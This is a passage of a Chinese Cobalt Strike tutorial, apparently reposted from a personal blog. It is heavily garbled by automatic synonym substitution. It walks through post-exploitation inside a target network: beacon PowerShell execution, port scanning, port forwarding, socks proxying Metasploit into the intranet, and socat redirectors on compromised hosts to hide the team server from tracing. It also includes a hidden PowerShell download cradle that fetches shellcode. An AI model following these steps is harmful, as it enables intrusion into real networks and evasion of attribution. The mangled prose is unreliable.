    率先种办法,在beacon shell中程导弹入外界ps脚本到长途机器上

    powershell-import /root/Desktop/Get-Information.ps1

    powershell Get-Information

    图片 84

    其次种办法,在beacon shell中一贯施行powershell代码

    powerpick Get-Host

    图片 85

    0x08 利用cs灵活穿透指标内网

    对指标机器所在的内网举行常规端口扫描,钦定ip段,钦定用于扫描的情商[暂只协理arp,icmp,tcp],钦赐线程[纪事实际中不用开的太高]

    portscan 192.168.1.0/24 1-6000 arp 10

    图片 86

    becon shell内置的端口转载作用,把本机的有个别端口转到公网或许内网钦赐机器的某部端口上,实际用的时候速度确实相当的慢,况且日常断……原因暂未知

    rportfwd 389 192.168.1.181 3389

    rportfwd stop 389

    图片 87

    图片 88

    让cs和msf相互间联合浮动接受,在对象机器上开启socks4a代理,方便进一层的内网渗透

    第风流倜傥种,利用各个socks代理客商端直接把各样渗漏工具带进目的内网

    beacon> socks 1234

    图片 89

    # vi /etc/proxychains.conf

    socks4 53.3.3.6 1234

    # socks stop

    图片 90

    第三种,直接利用隧道直接把全部msf带进指标内网

    setg Proxies socks4:53.3.3.6:1234

    图片 91

    图片 92

    利用beacon shell连接内网中的linux机器

    ssh 192.168.1.199:22 root admin

    图片 93

    通过beacon隧道直接派生一个meterpreter的shell[非vps上做转账,直接通过beacon隧道过来],流程非常的粗略,首先,在集体服务器上做端口转载,然后创立一个外表监听器,端口和ip写beacon shell的机械所在的ip,然后在相应的beacon shell中’spawn’选中刚刚创制好的外表监听器,暂且还应该有个别难点还没很好的减轻,前边单独说

    有关哪些选拔msf弹回贰个beacon shell的艺术就广大了,最简易的艺术正是向来实践下beacon的payload的代码就能够了,又忘贴图了,汗……前期再补上来吧

    0x09 合作常规端口转载尽只怕蒙蔽本人的团体服务器

    临时为了张冠李戴,防止被旁人急速溯源到,大概会在这里中加一些跳板来尽大概掩盖大家实在的团协会服务器地方,咋做呢,其实很简短

    说白点就是做端口转载[又名重定向],当然啦,那些端口转载鲜明是在融洽已部分肉鸡上做[论佚名的首要]

    设若您实际不放心,也能够品尝同有的时候间在八个肉鸡上,做连串转载[也正是多加几层跳板],以此来吸引对方,加大对手的根源难度,那是其大器晚成

    还某个指标内网中的某个机器是迫林和平常直连公网的,只可以内网机器间相互拜谒,但大家依旧想让那台不能够上网的机器也能寻常上线

    那将在选择大家立马要说的端口转载,至于实际用如何工具自然就不行多了,但是,依旧引入大家首推一些系统自带工具来搞,比方,netsh,iptables,socat之流……

    这样,你好,我也好 ^_^

    上面就用socat来简单演示下怎么样尽量隐讳自身的团体服务器,关于内网断网机器上线也是一模一样的道理,大家可活动尝试

    第风流浪漫,到kali中用cs顾客端登到大家的团体服务器,创造贰个正常80端口的监听器,这里的回连ip暂且直接用vps所在的诚实ip[实际上中尽量用域名,很入眼],如下

    图片 94

    图片 95

    进而,就能够ssh到肉鸡上用socat开端做转账了,上边那句话的情致就是以往自外界的80端口上的流量转到公网vps的80端口上,之后肉鸡本地的80端口会直接处于监听状态,只要80端口大器晚成有流量经过就能够活动转变到vps的80端口,而vps的80端口又刚刚是大家的监听器端口,那意味,相信您懂的

    # socat tcp-listen:80,reuseaddr,fork tcp:53.3.3.6:80 &

    图片 96

    那时,回到cs顾客端随意创造三个powershell payload,注意,正如大家面前所说,那只是个powershell下载器,主要担当下载真正的shellcode代码,必定要记得把前边的ip要改成肉鸡的ip[因为作者这里是效仿的肉鸡,所以才是个内网ip,实际中自然是个公网ip可能域名],因为我们最后的目标是透过肉鸡帮我们转载到大家真正的公司服务器上去,以此来达到尽量隐敝的指标

    潜心这里,私下认可生成未来,它是大家同生共死团队服务器分析的特别域名,实际中必然要手动把它改成肉鸡的域名或ip,那样,当下载访谈必定将首先会采访到肉鸡,而笔者辈早已在肉鸡做了转接,所以最终依旧会达到大家的公司服务器成功下载到shellcode代码,小编个衣架饭囊,竟然连码都没打全,算了,反正vps立刻也快到点了,打游击打习贯了,嘿嘿……^_^

    # powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

    图片 97

    图片 98

    图片 99

    图片 100

    末尾,我们看出目的不奇怪上线,至于,怎么让对象内网中一定要奇怪连网的机器也能健康上线都以一模二样的道理,你能够把payload回连的流量弹到内网中别的意气风发台能够健康上网的机械上,然后再去那台机器上把弹过来的流量转到大家组织服务器上,那样就能够达成让内网中无法上网的机器也同样健康上线

    0x10 深切明白dns隧道通讯以至smb beacon通讯进程,那说不许是全部工具最中心的地点之豆蔻年华,后续会用多量的篇幅单独说

    0x11 至于牛逼的告诉生成成效这里就背着了呢,援助风度翩翩键导出pdf,实际渗透进程中的全体操作记录数据总体都被保存在钦赐的目录中,大家有意思味可机关钻研,比较轻巧,终究不是大家这里的关键,就非常的少啰嗦了

    好几总计:

    世家也来看了,关于工具本人使用特别轻松,纯图形化操作,微微有个别基本功,异常的快就能够上手,并且它一贯帮衬Logo灵活拖拽,很有利对点名肉鸡举办聚集批量操作,非常投机,实际中校msf和cs同盟起来进行内网渗透,无疑近些日子也是极好的,真正的难点还在于对两样协商的beacon shell通讯进程的通晓,那也是私有认为整个工具最值钱的地点,说真的,关于此中间的通讯细节相当多标题由来仍干扰着自家,一贯都感觉cs自身就是生机勃勃款极度周密的读书样品,里面有太多值得深挖沉淀的事物,只是苦于有无尽东西,并不是一人所能达成,相信也我们跟本人同样,绝不会仅仅知足于工具基本接纳上,其实内心都很了然,那样基本是不会有啥实质性的前进的,时间少之又少,容不得浪费,所以也十三分期望跟大家一块儿深切调换……对了,cs 3.8也已经出来了黄金年代段时间了,想尝鲜的情人能够去探索,延长试用期照旧老办法…

    小说出处:klion's blog

    初藳链接:)

    主要编辑:

    本文由金莎娱乐发布于互联网,转载请注明出处:火速上手,渗透神器体系

    关键词: